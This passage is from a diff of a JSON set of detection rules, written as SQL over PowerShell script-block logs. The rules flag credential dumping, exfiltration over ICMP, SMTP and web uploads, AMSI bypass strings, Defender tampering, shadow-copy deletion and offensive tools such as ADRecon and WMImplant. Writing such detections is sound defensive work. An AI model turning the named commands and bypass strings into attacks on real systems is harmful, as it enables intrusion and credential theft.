+ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Suspicious Mount-DiskImage", - "id": "29e1c216-6408-489d-8a06-ee9d151ef819", - "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mount_diskimage.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE 
'\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { - "title": "Replace Desktop Wallpaper by Powershell", - "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "status": "test", - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "author": "frack113", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_wallpaper.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + 
"title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ], + "falsepositives": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. 
or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + ], + "filename": "posh_ps_accessing_win_api.yml" + }, + { + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", "author": "frack113", "tags": [ "attack.collection", - "attack.t1074.001" + "attack.t1114.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "title": "Import PowerShell Modules From Suspicious Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "description": "Detects powershell scripts that import modules from suspicious directories", "author": 
"Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_audio_exfiltration.yml" 
+ "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", + "status": "test", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", 
"status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": 
"86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "author": "frack113", + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + ], + "filename": "posh_ps_upload.yml" + }, + { + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "status": "test", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1047", "attack.t1059.001" ], + "falsepositives": [ + "Administrative scripts that use the same keywords." 
+ ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + ], + "filename": "posh_ps_wmimplant.yml" + }, + { + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Suspicious Mount-DiskImage", + "id": "29e1c216-6408-489d-8a06-ee9d151ef819", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_susp_mount_diskimage.yml" }, { - "title": "Computer Discovery And Export Via 
Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", - "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": 
"9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' 